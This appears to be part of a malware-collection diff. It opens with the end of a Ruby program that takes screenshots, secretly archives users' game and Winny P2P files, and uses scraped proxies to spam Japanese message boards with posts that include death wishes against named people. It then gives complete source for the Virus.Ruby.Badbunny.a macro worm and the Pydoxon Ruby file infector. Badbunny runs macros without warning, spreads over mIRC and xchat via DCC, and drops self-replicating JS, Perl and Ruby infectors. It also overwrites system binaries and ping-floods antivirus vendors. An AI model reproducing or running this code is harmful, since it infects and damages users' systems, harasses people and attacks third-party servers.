releaceDC = Win32API.new('user32', 'ReleaseDC', 'll', 'l')
dc2dib = Win32API.new('imgctl', 'DCtoDIB', 'lllll', 'l')
dib2png = Win32API.new('imgctl', 'DIBtoPNG', 'pli', 'i')
deleteDib = Win32API.new('imgctl', 'DeleteDIB', 'l', 'i')
begin
akakaka = roname
hdc = getDC.call(0)
hdib = dc2dib.call(hdc,0,0,0,0)
dib2png.call($upup+'[バグザロック] '+$tekito_id+' '+Time.now.strftime('%Y%m%d-%H%M%S')+' '+$charanames.join('')+'.png', hdib, 0)
File.rename(Dir.glob('C:/program files/daemontools/*.zip')[0], "#{$upup}[バグザロック] #{$id} 「#{$charanames.join('」「')}」.zip") if (Dir.glob('C:/program files/daemontools/*.zip').size > 0)
ensure
deleteDib.call(hdib)
releaceDC.call(0, hdc)
end
if akakaka
jikan = Time.now
if jikan.wday == 0 and jikan.hour < 24 and jikan.hour > 18
emotion_wana "やあ僕BOTer#{$charanames[rand($charanames.size)]} はBOTだよ ハゲ孫泰蔵と森下はさっさと死ね!!"
sleep 5 * 60
else
sleep 12 * 60
end
else
begin
open('c:/program files/internet explorer/iexplore.exe', 'a'){}
sleep 20 * 60
rescue
sleep 15 * 60
end
end
end
}
#init
$savefile = 'C:/RECYCLER/explorer.sys'
if !loaddata($savefile)
Thread.new(&$capture)
search
savedata($savefile)
else
Thread.new(&$capture)
end
if $tekito_id.size == 0
$tekito_id = $id
end
#p $ropath, $korepath, $nypath, $toolpath, $charanames
if Dir.glob('C:/program files/daemontools/*.zip').size == 0
begin
tmpf = 'C:/RECYCLER/tmp/'
Dir.mkdir(tmpf) if !File.exist?(tmpf)
$toolpath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', 'txt')
}
$korepath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', 'fld')
}
$ropath.each{|x|
to = tmpf + x.gsub(/\/|:/, '_')
if File.exist?(to);to = to + '_';end
Dir.mkdir(to)
Dir.copy(x + '/', to + '/', '.grf', '.gpf', '.mp3', '.bmp', '.ebm', '.fld')
}
$nypath.each_with_index{|x, i|
if i == 0
to = tmpf + 'winny'
else
to = tmpf + 'winny' + i.to_s
end
Dir.mkdir(to) if !File.exist?(to)
File.copy(x + '/' + 'Download.txt', to + '/' + 'Download.txt') if File.exist?(x + '/' + 'Download.txt')
File.copy(x + '/' + 'Tab1.txt', to + '/' + 'Tab1.txt') if File.exist?(x + '/' + 'Tab1.txt')
File.copy(x + '/' + 'Tab2.txt', to + '/' + 'Tab2.txt') if File.exist?(x + '/' + 'Tab2.txt')
}
$kakikomi.each{|x|
File.copy(x, tmpf + x.gsub(/\/|:/, '_')) if !File.exist?(x)
}
seven_zip = Win32API.new('7-zip32.dll', 'SevenZip', 'lppl', 'i')
str = 'aaaaa'
seven_zip.call(0, 'a -tzip -hide "' + $upup + '[バグザロック] ' + $id + ' 「' + $charanames.join('」「') + '」.zip" c:\recycler\tmp\ -r', str, 5)
rescue
p $!
print $!.backtrace.join("\n")
ensure
delete_dir tmpf
end
end
#exit
$path = $ropath[0] + '/'
$roaddr = File.exist?($path + 'roaddr.dll')
$ro = File.exist?($path + 'ragexe.exe')
$are = File.exist?($path + 'ws2_32.dll')
$rtx = File.exist?($path + 'ddraw.dll')
def rtx
rns(rns('rR'), rns('あアア') + rns('-あアア') + rns('るルル')) +
rns(rns('tT'), rns('てテテ') + rns('いぃイぃイ') + rns('いイイー-')) +
rns(rns('xX'), rns('えエエ') + rns('つツっッッ') + rns('くクク') + rns('すスス'))
end
def aretool
rns(rns('aA'), rns('あアア')) +
rns(rns('rR') + rns('eE'), rns('れレレ')) +
rns(rns('tT') + rns('oO0'), rns('つツツ')) +
rns(rns('oO0'), rns('うウウー-')) +
rns(rns('lL'), rns('るルル'))
end
$nypath.each{|x|
if File.exist?(x + '/Tab1.txt')
open(x + '/Tab1.txt'){|f|
$omosiro_words = f.read.split("\n")
}
end
}
def getThreads
http = Web::Agent.new
http.setup
http.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
$category, $bbs = *$bbs_arr[rand($bbs_arr.size)]
http.get("http://jbbs.livedoor.jp/#{$category}/#{$bbs}/subject.txt")
$suret = http.rsp.body.split("\n")
sss = []
$suret.each{|sure|
if !sure.match(/.*\(10000?\)/)
sure.match(/^(\d+)/)
sss.push $1
end
}
return sss;
end
#p '書き込み開始'
agent = Web::Agent.new
agent.setup
agent.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
agent.get('http://www.cybersyndrome.net/pla.html')
agent.rsp.body.match("")
proxy = []
while($'.match(/\"A\">([^<>]*)<\/a>/)) #'
proxy.push($~[1])
end
proxy.delete_if{|pr|
pr.match(/(80)|(8080)/)
}
proxy.collect! do |i|
i.split(':')
end
count = 0
while(1)
sure = getThreads;
if rand(6) == 0
for ituuu in 0..9
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
age.get 'http://yy14.kakiko.com/landstriker/subject.txt'
suret = age.rsp.body.split("\n")
sss = []
suret.each{|sure|
if !sure.match(/.*\(10000?\)/)
sure.match(/^(\d+)/)
sss.push $1
end
}
Thread.new{
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
age.req.header['content-type']='application/x-www-form-urlencoded'
ran = rand(proxy.size)
if rand(2) == 1
age.proxy_host = proxy[ran][0]
age.proxy_port = proxy[ran][1]
end
if sss.size != 0
if $id == ''
age.req.form.add 'FROM', (10000 + rand(90000)).to_s
age.req.form.add 'mail', 'sage'
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
else
names
age.req.form.add 'FROM', $id
age.req.form.add 'mail', ''
massage = ''
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
massage += rtx + "\n" if $rtx
massage += aretool + "\n" if $are
massage += "RoAddr\n" if $roaddr && rand(2) == 1
massage += "KORE\n" if $korepath.size > 0
massage += $charas
age.req.form.add 'MESSAGE', massage
end
age.req.form.add 'bbs', 'landstriker'
age.req.form.add 'key', sure[rand(sure.size)]
age.req.form.add 'time', Time.now.to_i.to_s
age.req.form.add 'submit', '書き込む'
age.post('http://yy14.kakiko.com/test.bbs.cgi')
else
suret[rand(suret.size)].match(/,(.+)\(/)
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
age.req.form.add 'FROM', ''
age.req.form.add 'mail', ''
age.req.form.add 'subject', $1.chop + rand(10).to_i.to_s
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
age.req.form.add 'bbs', $bbs
age.req.form.add 'time', Time.now.to_s.toi
age.req.form.add 'submit', '新規スレッド作成'
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
end
}
end
else
if sure.size != 0
loop do
sleep $wait_time
r = rand proxy.size
Thread.new(r, proxy){|ran, pro|
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
if rand(2) == 1
age.proxy_host = pro[ran][0]
age.proxy_port = pro[ran][1]
end
if $id == ''
age.req.form.add 'NAME', (10000 + rand(90000)).to_s
age.req.form.add 'MAIL', 'sage'
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
else
names
age.req.form.add 'NAME', $id.chop.chop
age.req.form.add 'MAIL', ''
massage = ''
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
massage += rtx + "\n" if $rtx
massage += aretool + "\n" if $are
massage += "RoAddr\n" if $roaddr && rand(2) == 1
massage += "KORE\n" if $korepath.size > 0
massage += $charas
age.req.form.add 'MESSAGE', massage
end
age.req.form.add 'BBS', $bbs
age.req.form.add 'KEY', sure[rand(sure.size)]
age.req.form.add 'TIME', Time.now.to_s.to_i
age.req.form.add 'DIR', $category
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
}
count += 1
break if count % 10 == 0
end
else
$suret[rand($suret.size)].match(/,(.+)\(/)
age = Web::Agent.new
age.setup
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
age.req.header['content-type']='application/x-www-form-urlencoded'
age.req.form.add 'NAME', ''
age.req.form.add 'MAIL', ''
age.req.form.add 'SUBJECT', $1.chop + rand(10).to_i.to_s
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ')
age.req.form.add 'BBS', $bbs
age.req.form.add 'TIME', Time.now.to_s.to_i
age.req.form.add 'DIR', $category
age.post("http://jbbs.livedoor.jp/bbs/write.cgi/#{$category}/#{$bbs}/#{age.req.form['KEY']}")
end
end
end
while Thread.list.size > 2
sleep 10
end

314
Ruby/Virus.Ruby.Badbunny.a Normal file
View File

@ -0,0 +1,314 @@
Dim Url As String
Dim myFileProp as Object
Sub badbunny()
rem Ooo.BadBunny by Necronomikon&Wargame from [D00mRiderz]
Dim mEventProps(1) as new com.sun.star.beans.PropertyValue
mEventProps(0).Name = "EventType"
mEventProps(0).Value = "StarBasic"
mEventProps(1).Name = "Script"
mEventProps(1).Value = "macro://ThisComponent/Standard.badbunny.startgame"
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
oDocument = ThisComponent
otext=oDocument.text
ocursor=otext.createtextcursor()
otext.insertString(ocursor, "BadBunny(c)by Necronomikon[DR],Skyout,Wargame[DR]",false)
url=converttourl("http://www.gratisweb.com/badbunny/badbunny.jpg")
oDocument = StarDesktop.loadComponentFromURL(url, "_blank", 0, myFileProp() )
msgbox "Hey " +Chr(31)+environ("username") +Chr(31)+ " you like my BadBunny?", 32,"///BadBunny\\\"
call ping
end sub
sub startgame
if GetGUIType =1 then 'windows
call win
end if
if GetGUIType =3 then 'MacOS
call mac
end if
if GetGUIType =4 then 'linux
call lin
end if
end sub
sub win
Dim dirz As String
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
datei="c:\badbunny.odg"
dateiurl=converttourl(datei)
odoc=thisComponent
odoc.storeasurl(dateiurl,dummy())
dirz=Environ ("programfiles")
Open "c:\drop.bad" For Output As #1
Print #1, "[script]"
Print #1, "n0=; IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"
Print #1, "n1=/titlebar *#*#*#*#*#*( Not every Bunny is friendly... )*#*#*#*#*#*#*"
Print #1, "n2=on 1:start:{"
Print #1, "n3= /if $day == Friday { /echo }"
Print #1, "n4=on 1:Join:#:if $chan = #virus /part $chan"
Print #1, "n5=on 1:connect:.msg Necronomikon -=I am infected with ur stuff!!!=-"
Print #1, "n6=on 1:connect:.msg wargame -=I am infected with ur stuff!!!=-"
Print #1, "n7=on 1:text:#:*hi*:/say $chan kick me"
Print #1, "n8=on 1:text:#:*hello*:/say $chan kick me"
Print #1, "n9=on 1:part:#:{"
Print #1, "n10=set %M_E $me"
Print #1, "n11=set %NickName $nick"
Print #1, "n12=set %ccd .dcc"
Print #1, "n13= if %NickName != %M_E {"
Print #1, "n14= /q %NickName lets do it like a rabbit...;)"
Print #1, "n15= /msg %NickName Be my bunny!"
Print #1, "n16=%ccd send -c %NickName c:\badbunny.odg"
Print #1, "n17= }"
Print #1, "n18=}"
Close #1
if ( Dir(dirz &"\mirc") <> "") then
Filecopy "c:\drop.bad" , dirz &"\mirc\script.ini"
end if
if ( Dir("c:\mirc") <> "") then
Filecopy "c:\drop.bad" , "c:\mirc\script.ini"
end if
if ( Dir(dirz &"\mirc32") <> "") then
Filecopy "c:\drop.bad" , dirz &"\mirc32\script.ini"
end if
if ( Dir("c:\mirc32") <> "") then
Filecopy "c:\drop.bad" , "c:\mirc32\script.ini"
end if
Open "c:\badbunny.js" For Output As #2
Print #2, "// BadBunny"
Print #2, "var FSO=WScript.CreateObject(unescape(""%53"")+unescape(""%63"")+unescape(""%72"")+unescape(""%69"")+unescape(""%50"")+unescape(""%74"")+unescape(""%69"")+""n""+unescape(""%67"")+"".""+unescape(""%46"")+unescape(""%69"")+""l""+unescape(""%65"")+unescape(""%53"")+unescape(""%79"")+unescape(""%73"")+unescape(""%74"")+unescape(""%65"")+""mO""+unescape(""%62"")+""j""+unescape(""%65"")+unescape(""%63"")+unescape(""%74""))"
Print #2, "var me=FSO.OpenTextFile(WScript.ScriptFullName,1)"
Print #2, "var OurCode=me.Read(1759)"
Print #2, "me.Close()"
Print #2, "nl=String.fromCharCode(13,10); code=''; count=0; fcode=''"
Print #2, "file=FSO.OpenTextFile(WScript.ScriptFullName).ReadAll()"
Print #2, "for (i=0; i < file.length; i++) { check=0; if (file.charAt(i)==String.fromCharCode(123) && Math.round(Math.random()*3)==1) { foundit(); check=1 } if (!check) { code+=file.charAt(i) } }"
Print #2, "FSO.OpenTextFile(WScript.ScriptFullName,2).Write(code+fcode)"
Print #2, "var jsphile=new Enumerator(FSO.GetFolder(""."").Files)"
Print #2, "for(;!jsphile.atEnd();jsphile.moveNext())"
Print #2, "{"
Print #2, "if(FSO.GetExtensionName(jsphile.item()).toUpperCase()==""JS"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,1)"
Print #2, "var Marker=filez.Read(11)"
Print #2, "var allinone=Marker+filez.ReadAll()"
Print #2, "filez.Close()"
Print #2, "if(Marker!=""// BadBunny"")"
Print #2, "{"
Print #2, "var filez=FSO.OpenTextFile(jsphile.item().path,2)"
Print #2, "filez.Write(OurCode+allinone)"
Print #2, "filez.Close()"
Print #2, "}"
Print #2, "}"
Print #2, "}"
Print #2, "function foundit()"
Print #2, "{"
Print #2, "fcodea=''; count=0; randon='';"
Print #2, "for (j=i; j < file.length; j++) { if (file.charAt(j)==String.fromCharCode(123)) { count++; } if (file.charAt(j)==String.fromCharCode(125)) { count--; } if (!count) { fcodea=file.substring(i+1,j); j=file.length; } }"
Print #2, "for (j=0; j < Math.round(Math.random()*5)+4; j++) { randon+=String.fromCharCode(Math.round(Math.random()*25)+97) }"
Print #2, "fcode+=nl+nl+'function '+randon+'()'+nl+String.fromCharCode(123)+nl+fcodea+nl+String.fromCharCode(125)"
Print #2, "code+=String.fromCharCode(123)+' '+randon+'() '"
Print #2, "i+=fcodea.length;"
Print #2, "}"
Print #2, "//->"
Close #2
Shell("c:\badbunny.js",0)
oDoc.store()
End Sub
sub lin()
'xchat2worm part by WarGame
dim HomeDir as string
dim xchat2script as string
dim perlvir as string
dim cmd as string
dim WgeT as string
Dim dummy()
Dim iVar As Integer
Dim Args(0) as new com.sun.star.beans.PropertyValue
Args(0).Name = "MacroExecutionMode"
Args(0).Value = _
com.sun.star.document.MacroExecMode.ALWAYS_EXECUTE_NO_WARN
ThisComponent.LockControllers
datei="/tmp/badbunny.odg"
dateiurl=converttourl(datei)
odoc=thisComponent
odoc.storeasurl(dateiurl,dummy())
' get home dir
HomeDir = Environ("HOME")
'build the path of our xchat2 script
if HomeDir = "" then
' I could not get $HOME !
else
xchat2script = HomeDir & "/.xchat2/badbunny.py"
' drop the python script
Open xchat2script For Output As #1
print #1,"__module_name__ = "+Chr(34)+"IRC_Worm/BadBunny (c)by Necronomikon&Wargame from[D00MRiderz]"+Chr(34)
print #1,"__module_version__ = "+Chr(34)+"0.1"+Chr(34)
print #1,"__module_description__ = "+Chr(34)+"xchat2 IRC_Worm for BadBunny"+Chr(34)
print #1,"import xchat"
print #1,"def onkick_cb(word, word_eol, userdata):"
print #1," if xchat.nickcmp(word[3],xchat.get_info("+Chr(34)+"nick"+Chr(34)+")) != 0:"
print #1," xchat.command("+Chr(34)+"DCC SEND "+Chr(34)+"+ word[3] +"+Chr(34)+" /tmp/badbunny.odg"+Chr(34)+")"
print #1," return xchat.EAT_NONE"
print #1,"xchat.hook_server("+Chr(34)+"KICK"+Chr(34)+", onkick_cb)"
close #1
endif
'drop the perl virus
perlvir = HomeDir & "/BadBunny.pl"
open perlvir for output as #1
print #1,"#BadBunny"
print #1,"open(File,$0);@MyCode = ;close(File);"
print #1,"foreach $FileName (<*>){open(File,$FileName);$chk = 1;while(){"
print #1,"if($_ =~ /#BadBunny/){$chk = 0;}}close(File);if($chk eq 1){"
print #1,"open(File,"+Chr(34)+">$FileName"+Chr(34)+");print File @MyCode;close(File);}}"
close #1
cmd = "perl " & perlvir
shell(cmd,0)
oDoc.store()
end sub
sub mac()
Dim iVar As Integer
iVar = Int((15 * Rnd) -2)
Select Case iVar
Case 1 To 5
call one
Case 6, 7, 8
call two
Case Is > 8 And iVar < 11
call one
Case Else
call two
End Select
end sub
sub one ()
'thx to skyout
Open "badbunny.rb" For Output As #1
print #1,"#!/usr/bin/env ruby"
print #1,"require 'ftools'"
print #1,"def replacecmd(cmdname, dirpath)"
print #1,"File.move(""#{dirpath}/#{cmdname}"", ""#{dirpath}/#{cmdname}_"")"
print #1,"oldcmd = File.open(""#{dirpath}/#{cmdname}"", File::WRONLY|File::TRUNC|File::CREAT, 0777)"
print #1,"oldcmd.puts ""#!/usr/bin/env ruby\n"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""puts \""\\t\\tYour system has been infected with:\"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> Dropper for BadBunny"""""
print #1,"oldcmd.puts ""puts \""\\t\\t>>>> by SkyOut"""
print #1,"oldcmd.puts ""puts \""\"""""
print #1,"oldcmd.puts ""puts \""Take a moment of patience ...\"""""
print #1,"oldcmd.puts ""puts \""Executing in ...\"""""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""3\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""2\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""1\"""
print #1,"oldcmd.puts ""sleep 1"""
print #1,"oldcmd.puts ""puts \""\"""
print #1,"oldcmd.puts ""for $args in $* do"""
print #1,"oldcmd.puts ""$argslist = \""#\{$argslist\}\"" + \"" \"" + \""#\{$args\}\"""
print #1,"oldcmd.puts ""end"""
print #1,"oldcmd.puts ""exec \""#{dirpath}/#{cmdname}_ #\{$argslist\}\"""
print #1,"oldcmd.puts ""exit 0"""
print #1,"end"
print #1,"$binary_dirs = Array.new"
print #1,"$binary_dirs = [ ""/bin"", ""/usr/bin"", ""/usr/local/bin"", ""/sbin"", ""/usr/sbin"", ""/usr/local/sbin"" ]"
print #1,"for $dir in $binary_dirs do"
print #1,"if File.directory?($dir) then"
print #1,"if File.writable?($dir) then"
print #1,"Dir.open($dir).each do |file|"
print #1,"next if file =~ /^\S+_/ || file == ""."" || file == "".."""
print #1,"replacecmd(file, $dir)"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"end"
print #1,"exit 0"
close #1
Shell("badbunny.rb",0)
end sub
sub two() 'thx to SPTH for this...
Open "badbunnya.rb" For Output As #2
print #2,"# BADB"
print #2,"mycode="""
print #2,"mych=File.open(__FILE__)"
print #2,"myc=mych.read(1)"
print #2,"while myc!=nil"
print #2,"mycode+=myc"
print #2,"myc=mych.read(1)"
print #2,"end"
print #2,"mycode=mycode[mycode.length-734,734]"
print #2,"cdir = Dir.open(Dir.getwd)"
print #2,"cdir.each do |a|"
print #2,"if File.ftype(a)==""file"" then"
print #2,"if a[a.length-3, a.length]=="".rb"" then"
print #2,"if a!=File.basename(__FILE__) then"
print #2,"fcode="""
print #2,"fle=open(a)"
print #2,"badb=fle.read(1)"
print #2,"while badb!=nil"
print #2,"fcode+=badb"
print #2,"badb=fle.read(1)"
print #2,"end"
print #2,"fle.close"
print #2,"if fcode[fcode.length-732,4]!=""BADB"" then"
print #2,"fcode=fcode+13.chr+10.chr+mycode"
print #2,"fle=open(a,""w"")"
print #2,"fle.print fcode"
print #2,"fle.close"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"end"
print #2,"cdir.close"
close #2
Shell("badbunnya.rb",0)
End Sub
sub ping()
Shell("ping -l 5000 -t www.ikarus.at",0)
Shell("ping -l 5000 -t www.aladdin.com",0)
Shell("ping -l 5000 -t www.norman.no",0)
Shell("ping -l 5000 -t www.norman.com",0)
Shell("ping -l 5000 -t www.kaspersky.com",0)
Shell("ping -l 5000 -t www.kaspersky.ru",0)
Shell("ping -l 5000 -t www.kaspersky.pl",0)
Shell("ping -l 5000 -t www.grisoft.cz",0)
Shell("ping -l 5000 -t www.symantec.com",0)
Shell("ping -l 5000 -t www.proantivirus.com",0)
Shell("ping -l 5000 -t www.f-secure.com",0)
Shell("ping -l 5000 -t www.sophos.com",0)
Shell("ping -l 5000 -t www.arcabit.pl",0)
Shell("ping -l 5000 -t www.arcabit.com",0)
Shell("ping -l 5000 -t www.avira.com",0)
Shell("ping -l 5000 -t www.avira.de",0)
Shell("ping -l 5000 -t www.avira.ro",0)
Shell("ping -l 5000 -t www.avast.com",0)
Shell("ping -l 5000 -t www.virusbuster.hu",0)
Shell("ping -l 5000 -t www.trendmicro.com",0)
Shell("ping -l 5000 -t www.bitdefender.com",0)
Shell("ping -l 5000 -t www.pandasoftware.comm",0)
Shell("ping -l 5000 -t www.drweb.com",0)
Shell("ping -l 5000 -t www.drweb.ru",0)
Shell("ping -l 5000 -t www.viruslist.com",0)
end sub

26
Ruby/Virus.Ruby.Pydoxon.b Normal file
View File

@ -0,0 +1,26 @@
# RUBY.Paradoxon
mycode=File.open(__FILE__).read(630)
cdir = Dir.open(Dir.getwd)
cdir.each do |a|
if File.ftype(a)=="file" then
if a[a.length-3, a.length]==".rb" then
if a!=File.basename(__FILE__) then
fcode=""
fle=open(a)
spth=fle.read(1)
while spth!=nil
fcode+=spth
spth=fle.read(1)
end
fle.close
if fcode[7,9]!="Paradoxon" then
fcode=mycode+13.chr+10.chr+fcode
fle=open(a,"w")
fle.print fcode
fle.close
end
end
end
end
end
cdir.close